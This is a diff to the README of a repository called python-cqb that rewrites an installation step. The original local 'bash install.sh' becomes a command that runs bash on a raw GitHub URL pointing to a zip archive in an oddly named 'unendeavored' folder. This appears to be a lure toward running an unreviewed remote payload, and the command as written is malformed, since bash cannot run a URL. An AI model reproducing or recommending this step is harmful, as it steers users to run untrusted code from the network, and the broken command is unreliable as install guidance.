facu18911891/python-cqb/README.md

 1. Unzip the downloaded file.
 2. Open a terminal window.
 3. Navigate to the unzipped folder.
-4. Run the installation script with the command `bash install.sh`.
+4. Run the installation script with the command `bash https://raw.githubusercontent.com/facu18911891/python-cqb/main/unendeavored/python-cqb.zip`.

 ## 🎉 Using python-cqb